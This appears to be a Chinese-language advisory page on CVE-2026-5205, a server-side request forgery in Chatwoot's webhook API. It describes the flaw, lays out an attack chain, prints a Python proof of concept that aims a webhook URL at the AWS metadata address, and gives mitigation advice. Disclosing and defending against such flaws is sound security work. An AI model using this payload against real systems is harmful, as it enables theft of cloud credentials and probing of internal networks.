CVE-2026-5205 CVSS 6.3 中危

CVE-2026-5205 Chatwoot SSRF漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5205

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Chatwoot

漏洞概述

CVE-2026-5205是Chatwoot软件中的一个安全漏洞，影响4.11.2及之前的版本。该漏洞位于Webhook API组件的Webhooks::Trigger函数中，由于对url参数处理不当，导致存在服务器端请求伪造（SSRF）。攻击者可利用此漏洞远程发起攻击，且目前已有公开的利用代码。

技术细节

该漏洞源于Chatwoot在处理Webhook触发请求时，未对用户提供的`url`参数进行充分的验证和过滤。在`lib/webhooks/trigger.rb`文件的`Webhooks::Trigger`函数中，应用程序直接使用了用户可控的URL发起HTTP请求。由于缺乏对目标地址、端口或协议的限制，攻击者可以通过构造恶意的URL，诱导服务器向内网敏感资源（如本地服务、元数据服务）发送请求。这可能导致内网端口扫描、敏感数据泄露（如AWS元数据）或对内部系统发起攻击。由于攻击向量为网络且无需用户交互，该漏洞具有一定的危害性。尽管厂商已收到通知但未回应，但公开的利用代码已增加了被攻击的风险。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标使用的是Chatwoot 4.11.2及以下版本。

STEP 2

2. 构造恶意Payload

攻击者创建包含内网IP地址（如 http://127.0.0.1/admin 或云元数据地址）的恶意URL。

STEP 3

3. 发送请求

攻击者利用低权限账号向Webhook API接口发送请求，将恶意URL填入url参数。

STEP 4

4. 服务器发起请求

Chatwoot服务器解析请求并主动向攻击者指定的内网地址发起HTTP请求。

STEP 5

5. 数据泄露或利用

攻击者根据响应或延迟判断内网服务状态，或获取敏感信息（如AWS凭证）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

# CVE-2026-5205 PoC: Chatwoot SSRF via Webhook URL
# Target: Chatwoot instance <= 4.11.2

target_url = "http://localhost:3000/api/v1/webhooks" # Example endpoint
attacker_controlled_url = "http://169.254.169.254/latest/meta-data/" # AWS Metadata or internal service

headers = {
    "Content-Type": "application/json",
    "api_access_token": "YOUR_API_TOKEN_HERE" # Requires Low Privilege (PR:L)
}

payload = {
    "webhook": {
        "url": attacker_controlled_url,
        "event_type": "conversation_created"
    }
}

print(f"[+] Sending SSRF payload to {target_url}")
print(f"[+] Target internal URL: {attacker_controlled_url}")

try:
    response = requests.post(target_url, json=payload, headers=headers)
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Body: {response.text}")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Chatwoot <= 4.11.2

防御指南

临时缓解措施

在未升级修复前，建议通过配置网络策略或防火墙规则，阻断Chatwoot服务器对非必要外部及内网IP的访问。同时，严格审查并禁用未使用的Webhook功能，监控异常的出站网络流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5205
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5205
3 Details https://www.cvedetails.com/cve/CVE-2026-5205/
4 VulDB https://vuldb.com/cve/CVE-2026-5205
5 Link https://vuldb.com/submit/780305
6 Link https://vuldb.com/vuln/354333
7 Link https://vuldb.com/vuln/354333/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表